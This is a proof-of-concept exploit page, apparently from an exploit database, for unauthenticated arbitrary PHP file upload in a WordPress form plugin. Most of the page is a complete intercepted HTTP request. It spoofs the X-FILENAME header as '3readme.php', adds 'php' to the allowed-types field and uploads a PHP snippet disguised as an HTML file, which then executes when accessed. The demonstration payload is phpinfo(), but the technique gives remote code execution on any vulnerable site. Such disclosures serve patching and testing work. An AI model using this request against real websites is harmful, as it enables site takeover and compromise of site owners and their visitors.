Share
## https://sploitus.com/exploit?id=WPEX-ID:DC34DC2D-D5A1-4E28-8507-33F659EAD647
1. Create a form with an upload input
2. As an unauthenticated user, upload an image file and intercept the request. 
3. Modify it like the following:

```
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: testbox
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X_FILENAME: 3readme.php
X-FILENAME: 3readme.php
Content-Type: multipart/form-data; boundary=---------------------------231372247329806589063676810774
Content-Length: 1110
Origin: http://testbox
Connection: close
Referer: http://testbox/wordpress/index.php/2024/04/08/hello-world/
Cookie: wordpress_ba62313c33aedb7d46cae591be063de4=mirphak%7C17151795;wpforms_fields_group_settings_advanced=true; 45df-a0b7-fdcb263f17ee57190a; PHPSESSID=m0tplmmem0pm28kseu7iola5d7
 
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="action"
 
arf_send_form_data
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="frm"
 
100
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="field_id"
 
gfeav2_58393
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="file_type"
 
text/html
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="types_arr"
 
htm|html, jpg|jpeg|php
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="is_preview"
 
 
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="files"; filename="readme.html"
Content-Type: text/html
 
<?phP  phpinfo(); ?>
 
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="token"
 
72JcFplqUK
-----------------------------231372247329806589063676810774--
```

Access the file (in the example above it is `3readme.php`) and see the PHP execute.